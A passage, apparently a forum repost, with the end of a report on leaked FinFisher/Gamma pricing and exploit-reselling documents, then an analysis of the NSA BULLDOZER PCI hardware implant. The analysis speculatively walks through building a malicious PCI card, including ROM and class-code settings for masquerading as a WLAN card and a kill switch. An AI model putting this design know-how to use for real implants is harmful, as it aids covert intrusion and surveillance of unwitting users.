Facebook. When it comes to training governments on how to use their malware, the Gamma documents show how quickly they can get authorities up and running on how to use the surveillance equipment: a basic intrusion course would take five days, while an extended course would need 10 days. 5. Relationships with other companies The symbiotic relationships between the leading firms have long suspected, and small elements of this collusion have been revealed previously. Gamma International has been shown to have worked hand-in-glove with two Swiss companies, Dreamlab and Elaman, supplying surveillance equipment to regimes such as Turkmenistan. These new Gamma documents have confirmed this is an established business partnership, revealing the role of both Swiss-based companies in reselling Gamma's products, and training clients in the field. Other documents have shown that the new FinFisher company and Elaman even have the same address. The training price-lists show the cooperation between these three distinct companies. If a government purchases a Gamma product from Elaman, they would receive a discount of 25% for software and support, while a discount of 15% is on offer for hardware and training, according to the pricelist. A slightly less generous discount of 20% and 10% is on offer for other agents and resellers, demonstrating the widespread partnerships throughout the industry. Alongside the training services offered by Gamma, it's noticeable they advertise the capabilities of the trainers from Dreamlab - who clearly come highly recommended for their knowledge of infrastructure as they command five times the salary as a Gamma staff member for in-country training. Through an examination of the line-by-line price-list, we see a window into the range and cost of services on offer. The breakdown shows wholly customisable services for the client - activation licences for FinSpy Mobile targeting Blackberry, Windows Mobile, iPhone, Symbian and Android; licences for After Sales Support and Updates for up to 3 years; User Manuals; Desktop workstations; specific laptops; as well as a critical evolution in the industry - access to the 'Exploit Portal' of French vulnerability developer, VUPEN. We've highlighted in the past Gamma's role in pushing 0-day exploits, and VUPEN's role in this market. Ties between VUPEN and Gamma/Finfisher have long been public and friendly, but the pricelist and documents confirm a business relationship between governments, Gamma, and the use of VUPEN's large database of exploits. In this transaction, VUPEN sell exploits to be used in the FinSpy exploit portal, which then Gamma/FinFisher turn around and sell to their customers. A Frequently Asked Questions document within the Gamma documents shows that the company, when selling exploits, apparently is often asked where the vulnerabilities come from. "Q: Can we name the supplier? A: Yes you can mention that we work with VUPEN here." We can now compare two pricelists from Gamma, the 2011 and new release. In 2011, a FinSpy Relay, Master, and Generation Licence for between one and 10 targets, cost a government €100,000. Yet we see a whopping 20% increase by the end of 2013 with the same service now costing €120,000. The FinSpy PC Activation licence covered Windows, and OSX at a cost of €1,950, but by 2013 this increased to €2,340 and the inclusion of licences for Linux. 6. The technology has evolved FinFisher, which takes complete control over a target's device once infected, came to international prominence in 2011 when documents uncovered in the aftermath of the Arab Spring showed its use by the Egyptian security services. The same year saw Wikileaks' SpyFiles 2 release showing various documents including training videos for Gamma's products i.e. FinSpy Mobile, FinUSB, and FinFly. Subsequent publications of brochures in SpyFiles 3 and our own Surveillance Industry Index continued to document what the company is selling. Gamma themselves describe their prospective clients as ranging from intelligence agencies, air force, navy and army groups, Customs departments and Presidential Guards. This sophisticated clientele would demand cutting edge solutions and technology that is consistently evolving and progressing. The Gamma documents show this evolution, through constant communication with their clients of forthcoming enhancements and versions with better capabilities. The presentations and training documents show the progression of intrusion techniques, pushing past 'traditional passive monitoring' for problems 'that can only be solved by adding IT intrusion solutions'. Gamma themselves highlight the 'global mobility of devices and targets' as a problem that needs to be 'solved', as well as anonymity through the use of hotspots, proxies, and webmail - as well as referencing Tor. The provision of 'roadmaps' show clients when updates for their purchases will be available, and detail the features of the new versions. For example, these roadmaps reveal new versions and enhancements of their invasive FinSpy Mobile. Version 4.4, released in of Q4 2012, has the ability to collect data through Skype across iOS, Blackberry, Android, and Windows Mobile platforms . An updated Version 4.5, released in Q1 2013, included the ability to target emails, calendars and keylogging of Windows Phones, and an updated ability to collect data through the camera of a Blackberry or iOS phone. It is important to add that more analysis will be needed to fully piece together and chart the progress of Gamma intrusion software. As we continue to analysis these documents, we will publish more information. Sursa: https://www.privacyinternational.org/blog/six-things-we-know-from-the-latest-finfisher-documents
-
This article is the second part of a series on NSA BIOS Backdoor internals. This part focuses on BULLDOZER, a hardware implant acting as malware dropper and wireless communication “hub” for NSA covert operations. Despite that BULLDOZER is a hardware, I still use the word “malware” when referring to it because it’s a malicious hardware. Perhaps the term “malware” should refer to both malicious software and malicious hardware, instead of referring only to the former. I’d like to point out why the BULLDOZER is classified as “god mode” malware. Contrary to DEITYBOUNCE, BULLDOZER is not a name in the realms of “gods”. However, BULLDOZER provides capabilities similar to “god mode” cheat in video games—which make the player using it close to being invincible—to its payload, GINSU. Therefore, it’s still suitable to be called god mode malware. The presence of BULLDOZER is very hard to detect, even with the most sophisticated anti malware tool during its possible deployment timeframe. As for GINSU, we will look into GINSU in detail in the next installment of this series. The NSA ANT Server document—leaked by Edward Snowden—describes BULLDOZER briefly. This article presents an analysis on BULLDOZER based on technical implications of the information provided by the NSA document. Despite lacking in many technical details, we could still draw a technically-sound analysis on BULLDOZER based on BIOS and hardware technology on the day BULLDOZER became operational, just like in the DEITYBOUNCE case. Introduction to GINSU-BULLDOZER Malware Combo BULLDOZER doesn’t work in isolation. It has to be paired with the GINSU malware to be able to work. As you will see in the next installment of this article, GINSU is a malicious PCI expansion ROM. Therefore, at this point, let’s just assume that GINSU is indeed a malicious PCI expansion ROM and BULLDOZER is the hardware where GINSU runs. This means BULLDOZER is a PCI add-in card, which is in line with the information in the NSA ANT server document. Before we proceed to analyze BULLDOZER, let’s look at the context where BULLDOZER and GINSU work. GINSU and BULLDOZER are a software and hardware combo that must be present at the same time to work. We need to look at the context where GINSU and BULLDOZER operate in order to understand their inner working. Figure 1 shows the deployment of GINSU and BULLDOZER in the target network. Figure 1 GINSU Extended Concept of Operations. Courtesy: NSA ANT Product Data Figure 1 shows BULLDOZER hardware implanted in one of the machines in the target network. The NSA Remote Operation Center (ROC) communicates via OMNIGAT with the exploited machine through an unspecified wireless network. This implies the GINSU-BULLDOZER malware combo targets machines in air-gapped networks or machines located in a network that is hard—but not impossible—to penetrate. In the latter case, using machines with malware-implanted hardware is more economical and/or stealthier compared to using an “ordinary” computer network intrusion approach. Let’s look closer at the technical information revealed by the NSA ANT product data document, before we proceed to deeper technical analysis. The NSA ANT server product data document mentions: GINSU provides software application persistence for the Computer Network Exploitation (CNE) implant—codenamed KONGUR—on systems with the PCI bus hardware implant, BULLDOZER. The technique supports any desktop PC system that contains at least one PCI connector (slot) and uses Microsoft Windows 9x, 2000, 2003 server, XP, or Vista. The PCI slot is required for the BULLDOZER hardware implant installation. BULLDOZER is installed in the target system as a PCI hardware implant through “interdiction”—fancy words for installing additional hardware in the target system while being shipped to its destination. After fielding, if KONGUR is removed from the system as a result of operating system upgrade or reinstallation, GINSU can be set to trigger on the next reboot of the system to restore the software implant. It’s clear that there are three different components in the GINSU-BULLDOZER combo from the four points of information above and from Figure 1. They are as follows: The first component is GINSU. The GINSU code name is actually rather funny because it refers to a knife that was very popular in 1980s and 1990s via direct sell marketing. Perhaps the creator of the GINSU malware refers to the Ginsu knife’s above average capability to cut through various materials. GINSU is possibly a malicious PCI expansion ROM—PCI expansion ROM is also called PCI option ROM in many PCI-related specifications; I will use both terms in this article. GINSU might share some modules with DEITYBOUNCE because both are a malicious PCI expansion ROM—see the DEITYBOUNCE analysis at NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute. However, it differs in many other aspects. First, GINSU runs on the NSA custom PCI add-in card, codenamed BULLDOZER. Therefore, GINSU could be much larger in size compared to DEITYBOUNCE because NSA controls the size of the flash ROM on the PCI add-in card. This means GINSU could incorporate a lot more functions compared to DEITYBOUNCE. Second is the type of PCI add-in card type that GINSU might use. From Figure 1, GINSU hardware (BULLDOZER) seems to masquerade as a WLAN PCI add-in card or other kinds of PCI add-in cards for wireless communication. This implies the PCI class code for the BULLDOZER hardware that contains GINSU probably is not a PCI mass storage controller like the one used by DEITYBOUNCE. Instead, the BULLDOZER PCI chip very possibly uses a PCI wireless controller class code. The second component is named BULLDOZER. This codename perhaps refers to the capability of BULLDOZER to push large quantities of materials to their intended place, which in the context of GINSU provides the capability to push the final payload (KONGUR) to the target systems. In this particular malware context, BULLDOZER refers to the PCI add-in card (hardware) implant installed in the target machine. BULLDOZER is a custom PCI add-in card. It very probably masquerades as a PCI WLAN add-in card because it provides a wireless communication function that requires a certain kind of antenna. However, this doesn’t prevent BULLDOZER from masquerading as another kind of PCI add-in card, but the presence of a physically larger antenna in the PCI WLAN card could boost the wireless signal strength. Therefore, the NSA might use the PCI WLAN card form factor to their advantage. We will look deeper into BULLDOZER implementation later. The third (last) component is named KONGUR. KONGUR is a bit mysterious name. It may refer to Kongur Tagh Mountain in China’s Xinjiang-Uyghur Autonomous Region. This could possibly means that the GINSU-BULLDOZER combo was devised for a campaign to infiltrate Chinese computer systems. After all, the Xinjiang-Uyghur Autonomous Region is famous for its people’s rebellion against the Chinese central government. This doesn’t mean that the GINSU-BULLDOZER combo wasn’t used against other targets in other campaigns though. KONGUR is a Windows malware that targets Windows 9x, 2000, XP, Server 2003 and Vista. GINSU provides the delivery and reinstallation mechanism for KONGUR. We can view KONGUR as the payload of the GINSU-BULLDOZER combo. It’s possible that KONGUR could also work in Windows Vista derivatives, such as Windows 7 and Windows Server 2008, or even later Microsoft operating system (OS), such as Windows 8, Server 2012, and 8.1 because KONGUR also targets Windows Vista, and we don’t know which 0-day exploit it uses and whether the 0-day exploit has already been patched or not. This article doesn’t delve deep into KONGUR and GINSU; the focus is on its hardware delivery mechanism, the BULLDOZER malware. The GINSU-BULLDOZER malware combo is the second NSA BIOS malware that we looked into that “abuses” the PCI expansion ROM—after DEITYBOUNCE. Well, we could say that the NSA is quite fond of this technique. Though, as you will see later, it’s a justified fondness. Anyway, this hypothesis on the GINSU-BULDOZER combo is bound to have subtle inaccuracies because I have no sample of the malware combo to back-up my assertions. I’m very open to constructive criticism in this regard. Now, we are going to look into BULLDOZER technical details. However, if you’re not yet familiar with the PCI bus protocol, please read the first part of this series (NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). There are links in that article that further break down the required prerequisite knowledge, just in case you’re not up to speed yet. BULLDOZER: NSA Malicious PCI Add-In Card In this section we delve into details of the procedures that the NSA probably carries out to create the BULLDOZER hardware implant. Surely, the exact type of hardware used by the NSA may very well be different. However, I try to draw the closest analogy possible from the public domain knowledge base. Despite the NSA’s superiority compared to the private sectors, all of us are bound to the laws of physics and must adhere to hardware protocol in the target systems. Therefore, the NSA’s approach to build BULLDOZER couldn’t be that much different than the explanation in this article. In the BULLDOZER Implementation Recap section, I try to draw the most logical hypotheses on the BULLDOZER hardware implant, based on the explanation of the process in designing and creating a PCI add-in card similar to BULLDOZER. PCI add-in cards are installed on PCI expansion slots on the motherboard. Figure 2 shows a PCI add-in card sample. This PCI add-in card is a PCI WLAN card. Figure 2 highlights the PCI “controller” chip from Ralink—a WLAN controller—and the PCI slot connector in the add-in card. The term “controller” is a generic name given to a chip that implements the core function in a PCI add-in card. PCI hardware development documentation typically uses this term, as do PCI-related specifications. Figure 2 PCI add-in card sample. Courtesy: D-Link. I use a PCI WLAN card as an example because the GINSU extended concept of operation implies that the BULLDOZER hardware implant is a PCI wireless controller card. As to what kind of wireless protocol it uses, we don’t know. But, the point is, BULLDOZER could masquerade as a PCI WLAN card for maximum stealth. It would look innocuous that way. Figure 2 doesn’t show the presence of any flash ROM in the PCI add-in card. The PCI add-in card typically stores the PCI option ROM code in the flash ROM. The purpose of Figure 2 is just to show you the typical appearance of the PCI add-in card for wireless communications. We’ll get into the flash ROM stuff later on. PCI Add-In Card in OEM Desktop PC Circa 2008 Now, let’s look at how a typical 2008 desktop PC could be implanted with such a card. One of the desktop PCs from a system builder that still had a PCI slot(s) in 2008 is the Lenovo ThinkCentre M57 Desktop PC. I chose a Lenovo desktop PC as an example because its products were widely used in China—besides other parts of the world. It could probably be one of the victims of the GINSU-BULLDOZER campaign. Who knows? The Lenovo ThinkCentre M57 has two PCI slots. Let’s say NSA “interdicts” such a system. They can install BULLDOZER in it and then replace the user guide as well to make the BULLDOZER implant look like a legitimate PCI add-in card that comes with the PC, just in case the user checks the manual before using the system. Figure 3 Lenovo ThinkCentre M57 PCI Add-In Card Replacement Instructions (edited version of the original ThinkCentre Hardware Maintenance Manual instructions). Courtesy: Lenovo. The Lenovo ThinkCentre Hardware Maintenance Manual even comes with instructions to replace a failed PCI add-in card. Figure 3 shows the instruction to replace a PCI add-in card in an “exploded view” style. Hardware replacement instructions shown in Figure 3 are a pedestrian task to do; any NSA field agent can do that. PCI Wireless Communication Add-In Card Hardware and Software Co-Development Now, let’s look at the steps to develop a PCI wireless communication add-in card in general, because we presume that BULLDOZER falls within this PCI add-in card category. I’m quite sure the NSA also follows the approach explained here, despite being a very advanced spying agency. Only the tools and hardware it uses are probably different—perhaps custom-made. From a cost point of view, using a Commercial Off-The-Shelf (COTS) approach in creating BULLDOZER hardware would be more cost-effective, i.e. using tools already in the market cost much less than custom tools. COTS benefited from economic of scale and competition in the market compared to custom tools. Moreover, from operational standpoint, the GINSU-BULLDOZER target systems would likely evolve after five years, which dictates the use of new tools. Therefore, obsolescence, which usually plagues COTS solutions, is not a problem in the GINSU-BULLDOZER campaign. The latter fact strengthened my suspicion that the NSA very probably uses the COTS approach. We’ll look at this COTS approach shortly. The “crude” steps to develop a PCI add-in card and its assorted software in general—via the COTS approach—are as follows: High-level design. This step involves the high-level decision on what kind of PCI controller chip would be created for the PCI add-in card and what features the chip would implement and what auxiliary support chip(s) are required. For example, in the case of a PCI wireless communication add-in card, typically you will need a separate Digital Signal Processor (DSP) chip, or you need to buy the DSP logic design from a DSP vendor and incorporate that design into your PCI Field Programmable Gate-Array (FPGA). Hardware prototyping. This step involves creating the PCI controller chip prototype with a PCI FPGA development board. Typically, the language used to develop the PCI controller chip in the FPGA is either VHDL or Verilog. This mostly depends on the FPGA vendor. Software (device driver) development. This step involves creating a prototype device driver for the PCI add-in card for the target Operating System (OS). For example, if the device would be marketed for mostly Windows users, then creating a Windows device driver would take priority. As for other target OS, it would be developed later or probably not at all if market demands on the alternative OS don’t justify the cost involved in developing the driver. This step is typically carried-out in parallel to hardware prototyping once the first iteration of the FPGA version of the chip is available. Some FPGA vendors provide a “template” driver for certain target OS to help with the driver development. This way, the PCI controller chip development can run in parallel with the chip design. There are also third-party “driver template” vendors which are endorsed by the FPGA vendors, such as Jungo Windriver—see http://www.jungo.com/st/products/windriver/. Chip fabrication, also known as the making of the Application Specific Integrated Circuit (ASIC). In this step, the first design revision of the chip is finished and the design is sent to chip fabrication plant for fabrication, such as TSMC, UMC or other contract semiconductor fab. This is an optional step though, because some low-volume PCI add-in cards these days are made out of FPGA anyway. If the cost of chip fabrication doesn’t make economic sense against creating the product out of FPGA, then the final product uses FPGA anyway. Well, the NSA has several semiconductor fabs—for example, see NSA plant in San Antonio shrouded in secrecy - Houston Chronicle. One of the NSA’s fab probably was used to fabricate BULLDOZER PCI controller chip. Compatibility test on the PCI hardware-software “combo”. The chip vendor carries out the compatibility testing first. If the target OS is Windows, Microsoft also carries out additional compatibility testing. In the Windows platform, there is this so-called “WHQL” testing. WHQL stands for Windows Hardware Quality Labs. Windows Hardware Quality Labs testing or WHQL Testing is Microsoft’s testing process which involves running a series of tests on third-party hardware or software, and then submitting the log files from these tests to Microsoft for review. In case the primary target OS is not Windows, only the test from the hardware vendor is carried out. The NSA very probably also carries out this kind of test, but for an entirely different purpose, i.e. to make sure the driver works as stealthily as possible or to mislead the user to think the driver is just an ordinary PCI device driver. Steps 2 and 3 are actually iterative steps. The PCI hardware prototype goes through several iterations until it matures and is ready for fabrication. Step 4 could also happen as an iterative step, i.e. there are several revisions of the chip. The first revision might have a flaw or performance weakness that must be improved, despite being a functional design. In the commercial world, ASICs typically have several revisions. Each revision is marked as a “stepping”. You would find the word “stepping” mentioned in many CPU, chipset or System-on-Chip (SoC) technical documentation. “Simulating” BULLDOZER Hardware Now, let’s look into the process of developing a specific PCI add-in card, i.e. a PCI add-in card with wireless communication as its primary function. We focus on this kind of PCI add-in card because BULLDOZER connects to the outside world—to OMNIGAT in Figure 1—via an unspecified wireless connection. For this purpose, we look into the hardware prototyping step in more detail. Let’s start with some important design decisions in order to emulate BULLDOZER capabilities, as follows: The prototype must have the required hardware to develop a custom wireless communication protocol. The reason is because the wireless communication protocol used by BULLDOZER to communicate with OMNIGAT must be as stealthy as possible, despite probably using the same physical antenna as a PCI WLAN card. The prototype must have an implemented PCI expansion ROM hardware. The reason is because GINSU is a malicious PCI expansion ROM code that must be stored in a functional PCI expansion ROM chip to work. GINSU is configurable, or at the very least it can be optionally triggered—based on the NSA ANT server document. This means there must be some sort of non-volatile memory in the prototype to store GINSU parameters. It could be in the form of a Non-Volatile RAM (NVRAM) chip, like in the DEITYBOUNCE case. Storing the configuration data in a flash ROM or other kinds of ROM is quite unlikely, given the nature of flash ROM which requires a rather complicated procedure to rewrite. The next step is to choose the prototyping kit for the hardware. There are many PCI FPGA prototyping board in the market. We will look into one of them from Sundance (DSP and FPGA Solutions - Sundance Multiprocessor Technology Ltd.). Sundance is probably a very obscure vendor to you. However, this vendor is one of the vendors that provide a PCI development board for a Software-Defined Radio (SDR) application. You might be asking, why would I pick a PCI SDR development board as an example? The reason is simple, because SDR is the best approach when you want to develop your own wireless protocol. You can tune the frequency, the type of modulation, transmitter power profile, and other parameters needed to make the protocol as stealthy as possible. BULLDOZER Hardware “Simulation” with Sundance SMT8096 SDR Development Kit There are usually more than one FPGA in a typical PCI SDR development board. We are going to look into one of Sundance products which were available in the market before 2008—the year the GINSU-BULLDOZER malware combo was operational. I picked Sundance SMT8096 SDR development kit as the example in this article. This kit was available in the market circa 2005. The kit consists of several connected boards with a “PCI carrier” board acting as the host of all of the connected boards. The PCI carrier board connects the entire kit to the PCI slot in the development PC. Figure 4 shows the entire Sundance SMT8096 SDR development kit hardware. Figure 4 Sundance SMT8096 SDR development kit. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 4 shows the components of the Sundance SMT8096 SDR development kit. As you can see, the development kit consists of several circuit boards as follows: SMT395-VP30 board, which contains the Texas Instrument TI DSP C6416T chip and the Xilinx Virtex II Pro FPGA. The TI DSP C6416T chip provides the primary signal processing in the development kit, while the Virtex II FPGA provides the reconfigurable signal processing part. Actually, it’s the FPGA in this board that provides the term “software” in the “software-defined” part of the SDR abbreviation. The SMT350 board provides the Analog-to-Digital Converter (ADC) / Digital-to-Analog Converter (DAC) functions. This board provides two functions. First, it receives the analog input from the input antenna and then converts that input into its equivalent digital representation before feeding the result to the signal processing board. Second, it receives the digital output of the signal processing board and converts that digital signal into an analog signal to be fed into the output antenna. The input and output antenna could be the same or different, depending on the overall design of the SDR solution. The SMT368 board provides yet another FPGA, a Xilinx Virtex 4 SX35 FPGA. This board provides “protocol/data-format” conversion function as you can see in Figure 5 (Sundance SMT8096 SDR development kit block diagram). SMT310Q is the PCI carrier board. It’s this board that connects to the host (desktop PC) motherboard via the PCI connector. This board provides the PCI logical and physical interface into the host PC. Figure 5 shows the block diagram of the entire SDR development kit. It helps to understand interactions between the SDR development kit components. Figure 5 Sundance SMT8096 Development Kit Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Let’s look into SMT310Q PCI carrier board, because this board is the visible one from the motherboard BIOS perspective. We’ll focus on the technology required to communicate with the host PC instead of the technology required for the wireless communication, because we have no further clues on the latter. Moreover, I’m not an expert in radio communication technology in anyway. The SMT310Q PCI carrier board has a QuickLogic V363EPC PCI bridge chip, which conforms to PCI 2.1 specifications. This chip was developed by V3 Semiconductor, before the company was bought by QuickLogic. The V363EPC PCI Bridge connects the devices on the SMT8096 development kit to the host PC motherboard—both logically and electrically—via the PCI slot connector. This PCI bridge chip is not a PCI-to-PCI bridge, rather it’s a bridge between the custom bus used in the SMT8096 development kit and the PCI bus in the host PC. The correct term is Local Bus to PCI Bridge. Local bus in this context refers to the custom bus in the SMT8096 development kit—used for communication between the chips in the development kit boards. At this point we have made the important design decisions, we have picked the PCI hardware development kit to work with, and we have looked into the PCI-specific chip in the development kit. It’s time to get into details of the design implementation. The steps to implement the design are as follows: Assuming the wireless communication protocol has been defined thoroughly, the first step is to implement the protocol in the form of DSP chip firmware code and FPGA designs. The DSP chip firmware code consists of initialization code required to initialize the DSP chip itself, code to initialize the interconnection between the DSP chip and the Local Bus to PCI Bridge via the Local Bus interface, and code for other auxiliary functions. Assuming we use the Sundance SMT8096 kit, this step consists of creating the firmware code for the Texas Instrument TIC6416T DSP chip and creating the FPGA designs for the Xilinx Virtex-II and Xilinx Virtex-4 SX35. We are not going to delve into the details of this step, as we don’t know the specifics of the wireless communication protocol. The second step is to customize the hardware to support the PCI expansion ROM. This is required because we assume the GINSU malware is a malicious PCI expansion ROM code. In this step we configure the SMT310Q carrier board to support the PCI expansion ROM because this board is the one that interfaces with the host (x86/x64 desktop) PCI bus, both at the logical and physical level. We have to enable the Expansion ROM Base Address Register (XROMBAR) in the QuickLogic V363EPC PCI bridge chip (Local Bus to PCI Bridge) in the SMT310Q carrier board via hardware configuration, and we have to provide a flash ROM chip to store the PCI expansion ROM code on the board as well. If you’re not familiar with XROMBAR, refer to my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) for the details. Now, let’s focus on the last step: customizing the hardware required for the PCI expansion ROM to work. It’s the SMT310Q carrier board that implements the PCI bus protocol support in SMT8096 PCI SDR development kit. Therefore, we are going to scrutinize the SMT310Q carrier board to find out how we can implement the PCI expansion ROM on it. We start with the board block diagram. Figure 6 shows the SMT310Q block diagram. The block diagram is not a physical block diagram of the board. Instead, it’s a logical block diagram depicting logical interconnections between the board components. Figure 6 SMT310Q Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 6 shows blocks marked as TIM, i.e. TIM 1, TIM 2 and so on. TIM is an abbreviation for Texas Instrument Modules. TIM is a standard interconnection between boards using a Texas Instrument DSP chip and other board(s). I couldn’t find the latest version of TIM specifications. However, you can find TIM version 1.01 on the net. Despite that TIM implies that a DSP that should be connected via this interconnect, in reality, anything that conforms to the specifications can be connected. It’s important to know about TIM, because we are going to use it to “wire” the PCI expansion ROM and also to “wire” NVRAM into the SMT310Q carrier board later. Figure 6 shows that the QuickLogic V363EPC PCI bridge—marked as V3 PCI Bridge—connects to the TIMs via the 32-bit Global Bus. The 32-bit Global Bus corresponds to the LAD[31:0] multiplexed address and data lines in the QuickLogic V363EPC datasheet. This means the logical and physical connection from QuickLogic V363EPC to the PCI expansion ROM and the NVRAM in our design will be based on the Global Bus. Now, let’s look at how QuickLogic V363EPC exposes devices wired to the TIMs into the host x86/x64 CPU address space. QuickLogic V363EPC uses the so-called “data transfer apertures” to map devices connected through LAD[31:0] into the host x86/x64 CPU address space. These apertures are basically an address range claimed by the PCI Base Address Registers (BARs) in QuickLogic V363EPC. QuickLogic V363EPC datasheet uses different naming scheme for PCI BARs. Figure 7 shows the PCI BARs marked as PCI_BASEx registers. The PCI_MAPx registers in Figure 7 control the amount of memory or I/O range claimed by the PCI_BASEx registers. If you are new to PCI configuration space registers, my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) has a deeper explanation on the subject. You can compare the “standard” PCI configuration space registers explained there and the ones shown in Figure 7. Figure 7 QuickLogic V363EPC PCI configuration registers. Courtesy: QuickLogic V363EPC datasheet. Let’s look deeper into the “data transfer aperture” in QuickLogic V363EPC. The “aperture” is basically address remapping logic, i.e. it remaps addresses from the host x86/x64 CPU address space into the local address space in the SMT310Q PCI add-in board. If you’re new to address remapping, you can read a sample of the concept in System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute. Figure 8 shows simplified block diagram of the QuickLogic V363EPC aperture logic (address remapper). Figure 8 QuickLogic V363EPC Aperture Logic Figure 8 shows QuickLogic V363EPC claims two different ranges in the PCI address space of the host x86/x64 CPU address space. We are only going to delve into the first range claimed by the PCI_BASE0 register. This is the relevant excerpt from QuickLogic V363EPC datasheet: “4.1.8 Special Function Modes for PCI-to-Local Bus Apertures PCI-to-Local bus aperture 0 shares some functionality with the expansion ROM base aperture. The address decoder for PCI-to-Local aperture 0 is shared with the expansion ROM base register. When the expansion ROM base is enabled, the decoder will only bridge accesses within the ROM window. When the ROM is disabled, PCI-to-Local bus aperture 0 will function as described above. Typically, the expansion ROM is used only during BIOS boot, if at all. The expansion ROM base register can be completely disabled via software.” The excerpt above clarifies the PCI expansion ROM mapping. Basically, it says that when the PCI expansion ROM chip mapping is enabled via the XROMBAR register, the aperture will be used only for access to the PCI expansion ROM chip. No other chip can claim the transaction via the aperture. XROMBAR in QuickLogic V363EPC chip must be enabled in order to support PCI expansion ROM. This is quite a complicated task. We must find the default XROMBAR register value in the chip. The XROMBAR is named PCI_ROM register in QuickLogic V363EPC datasheet, as you can see in Figure 7. QuickLogic V363EPC datasheet mentions that PCI_ROM (XROMBAR) default value upon power-on is 00h. This means the XROMBAR is disabled because its least significant bit is zero—per PCI specification. However, this is not a problem as the default values of the PCI configuration space registers in QuickLogic V363EPC PCI bridge can be made configurable. There are hardware “straps” that control the default values of the PCI configuration space registers in QuickLogic V363EPC. One of the “straps’” configuration instructs QuickLogic V363EPC to “download” its PCI configuration space registers default values from an external serial EEPROM chip. Pay attention to the fact that this serial EEPROM chip is an entirely different chip from the PCI expansion ROM chip. Figure 9 shows the “straps” option for V363EPC PCI configuration space registers. Figure 9 QuickLogic V363EPC PCI Configuration Space Registers Default Values Initialization “straps” Option. Courtesy: QuickLogic V363EPC datasheet. Figure 9 shows there are two “straps” that control the default value initialization in V363EPC, i.e. SDA and SCL. Both of these “straps” are actually pins on the V363EPC chip. As you can see, when SDA and SCL are connected to serial EEPROM, the PCI configuration space registers default values will be initialized from serial EEPROM. The SDA and SCL pins adhere to I2C protocol. I2C is a serial protocol to connect microcontroller and other peripheral chips in a cost efficient manner, i.e. in as small a number of pins as possible, because pins and traces on a circuit board are costly to design and manufacture. SDA stands for Serial Data and SCL stands for Serial Clock, respectively. Figure 10 V363EPC to serial EEPROM connection circuit schematic. Courtesy: QuickLogic V363EPC datasheet. Figure 10 shows the circuit schematic to implement loading default PCI configuration space registers from EEPROM. Now we know how to “force” V3636EPC PCI configuration space registers default values to our liking. Once the pull-up resistors are set up to configure QuickLogic V363EPC to use serial EEPROM, the QuickLogic V363EPC PCI configuration space registers default values are stored in serial EEPROM and automatically loaded to QuickLogic V363EPC PCI configuration space after power-on or PCI bus reset, prior to PCI bus initialization by the motherboard BIOS. This means we can configure the XROMBAR default value via contents of the serial EEPROM. Therefore, the PCI_ROM (XROMBAR) can be enabled. Another PCI configuration register to take into account is the PCI_MAP0 register. The PCI_MAP0 register—highlighted in red box in Figure 7—controls whether the PCI_ROM register is enabled or not. It also controls size of the ROM chip to be exposed through the PCI_ROM register. Let’s look into details of the PCI_MAP0 register. Figure 11 shows the relevant excerpt for PCI_MAP0 register from QuickLogic V363EPC datasheet. Figure 11 PCI_MAP0 register description. Courtesy: QuickLogic V363EPC datasheet Figure 11 shows the ROM_SIZE bits in PCI_MAP0 register highlighted in yellow. The bits determine size of the PCI expansion ROM to be decoded by QuickLogic V363EPC. As you can see, the chip supports a PCI expansion ROM with size up to 64KB. Perhaps this size is not up to what a malicious PCI expansion ROM payload requires. However, a malicious PCI expansion ROM code can load additional code from other memory storage in the PCI add-in card when the ROM code executes. You must configure the ROM_SIZE bits default value to the correct value according to your hardware design. Entries in Figure 11 that have their “type” column marked as FRW means the default value of the bits are determined by the contents of the serial EEPROM if serial EEPROM support is activated via SDA and SCL “straps”. Therefore, all you need to do is place the correct value in the serial EEPROM to configure their default values. There is one more PCI configuration space register to take into account to implement BULLDOZER hardware, the Class Code register. The PCI Class Code register consists of three sub-parts: the base class, sub-class and interface. Figure 12 shows the class code selections for PCI Wireless Controller class of devices. Figure 12 PCI Wireless Controller Class Code As you see in Figure 12, we have to set the class code in our BULLDOZER chip design to base class 0Dh, sub-class 21h and interface 00h to make it masquerade as a PCI WLAN chipset that conforms to WLAN protocol revision B. Figure 7 shows the location of the Class Code register in the QuickLogic V363EPC chip. All you need to do is to store the correct class code in the serial EEPROM used to initialize contents of QuickLogic V363EPC PCI configuration space registers. This way our BULLDOZER design conforms to the PCI specification nicely. At this point we can control the QuickLogic V363EPC PCI configuration space register’s default values. We also have gained the required knowledge to map a PCI expansion ROM chip into the host x86/x64 CPU address space. The thing that’s left to design is the way to store the BULLDOZER configuration. Let’s assume that we design the BULLDOZER configuration in an NVRAM chip. We can connect the NVRAM chip to SMT310Q PCI carrier board via the TIM interface, just like the PCI expansion ROM chip. The process to design the interconnection is similar to what we have done for the PCI expansion ROM chip. Except that we must expose the chip to code running on the host x86/x64 CPU via different aperture, for example by using PCI-to-Local Aperture 1. Now, we know everything we need to implement a BULLDOZER hardware. There is one more thing left though, the “kill switch”, i.e. the hardware to “destroy” evidence, just in case an operation involving BULLDOZER hardware gets botched. Implementing “Kill Switch”: Military-Grade Electronics Speculation It’s a standard procedure to have a kill switch in military electronics. A kill switch is a mechanism that enables you to destroy hardware or software remotely, that renders the hardware or software beyond repair. The destruction must be sufficient to prevent the software or hardware from being analyzed by anyone. There are several reasons to have a kill switch. First, you don’t want an adversary to find evidence to implicate you in the event that an operation fails. Second, you don’t want your adversary to know your highly valued technology. There are other strategic reasons to have a kill switch, but those two suffice to conduct research into implementing a kill switch in BULLDOZER. BULLLDOZER is a hardware that consists of several electronic chips “bounded” together via circuit board. Therefore, what we need to know is the technique to destroy the key chips in a circuit board at moment’s notice. Surely, we turn to physics to solve this problem. From my experience as an overclocker in the past, I know very well that you can physically destroy a chip by inducing electromigration on it. From Wikipedia: Electromigration is the transport of material caused by the gradual movement of the ions in a conductor due to the momentum transfer between conducting electrons and diffusing metal atoms. Electromigration in simple terms means: the breakdown of metal interconnect inside a semiconductor chip due to migration of metal ions that construct the metal interconnect to an unwanted location. To put it simply, electromigration causes the metal interconnect inside the chip to be destroyed, akin to—but different 